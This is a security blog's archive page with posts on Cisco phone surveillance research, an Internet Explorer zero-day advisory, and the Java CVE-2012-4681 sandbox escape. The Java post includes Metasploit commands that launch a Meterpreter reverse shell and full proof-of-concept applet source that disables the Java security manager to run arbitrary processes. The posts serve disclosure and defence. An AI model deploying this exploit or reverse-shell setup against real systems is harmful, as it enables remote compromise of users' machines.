Tag Archives: 0-day
Video

Hacking Cisco Phones

Ang Cui and Michael Costello give a talk at the 29th Chaos Communications Congress in Hamburg titled, Hacking Cisco Phones.

Just because you are paranoid doesn’t mean your phone isn’t listening to everything you say

The two speakers “demonstrate practical covert surveillance using constant, stealthy exfiltration of microphone data via a number of covert channels.” Introspectively there are social issues around convincing people that phones matter.

make security important

 

IE – Year End 0-day

Zero day attack on Internet Explorer 0-day (CEV-2012-4792)! How quick did you respond to the interruption this holiday vacation?  IE 8, 7, and 6 makes up one-third of all desktop browser market. For consumers with XP OS, IE 9 and 10 are not supported; best to start using an additional browser such as Mozilla Firefox or Google Chrome.

Microsoft Security Advisory (2794220) explains:

The vulnerability is a remote code execution vulnerability that exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website.

For corporations needing IE on XP and who are unable to upgrade, Microsoft has a Fit It tool available (KB2794220).  Remember that a ‘Fix It’ is not a patch, rather an easy method to apply workaround configuration changes. Also note that you should remove the ‘Fit It’ once the final patch is applied.

It seems that one of the reasons for lunching the attacks during the holiday period was because of the belief  that IT/Security Administrators would be slower to respond. Where you or your team?

Leave a Comment
Video

CVE-2012-4681 Java 7 Windows Metasploit Demo

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is now patch from Oracle [Java 7 Update 7 release]. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Metasploit demo:

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Zero-Day Exploit for Java!

Oh how wonderful, a fully patched Windows 7 SP1 with Java 7 Update 6 (CVE-2012-4681) can be popped (actually, version 1.7 or later of JRE). “As an user, you should take this problem seriously, because there is currently no patch from Oracle. For now, our recommendation is to completely disable Java until a fix is available.[1]” Uninstall Java Runtime Environment (JRE) if you don’t need (or use) it. If you do need (and want) it, then at least disable the browser plugin(s) when its not in use. You could also consider installing an extra browser exclusively for Java based sites. Otherwise you’re at risk of a drive-by download! “The exploits actually are taking advantage of two unpatched vulnerabilities in Java 7 — not just one, as originally was believed.[2]”

Metasploit users can now easily test whatever defensive measures they will be putting in place to mitigate the damage from malicious exploits in the wild. Note that it is a client-side exploit, so you would typically launch it via the Modules tab. Assuming all goes as planned, a successful exploit run would look like the following screenshot.

PoC Code[3]:

//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
// 
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet
{

    public Gondvv()
    {
    }

    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}

source:
[1] https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day
[2] http://www.scmagazine.com/as-a-java-zero-day-spreads-disclosure-questions-arise/article/256511/
[3] http://pastie.org/4594319

Leave a Comment